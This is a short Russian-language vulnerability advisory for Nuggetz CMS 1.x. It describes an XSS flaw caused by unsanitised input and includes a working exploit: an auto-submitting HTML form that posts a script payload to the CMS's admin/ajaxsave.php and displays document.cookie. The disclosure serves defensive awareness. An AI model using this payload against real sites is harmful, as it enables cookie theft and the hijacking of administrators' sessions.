Программа: Nuggetz CMS 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<form action="http://example.com/nuggetz/admin/ajaxsave.php?nugget=nuggetnamefromclass&dummy=1"
method="post" name="main" >
<input name="pagevalue" type="hidden" value='page content"><script>alert(document.cookie)</script>'
/>
</form>
<script>
document.main.submit();
</script>
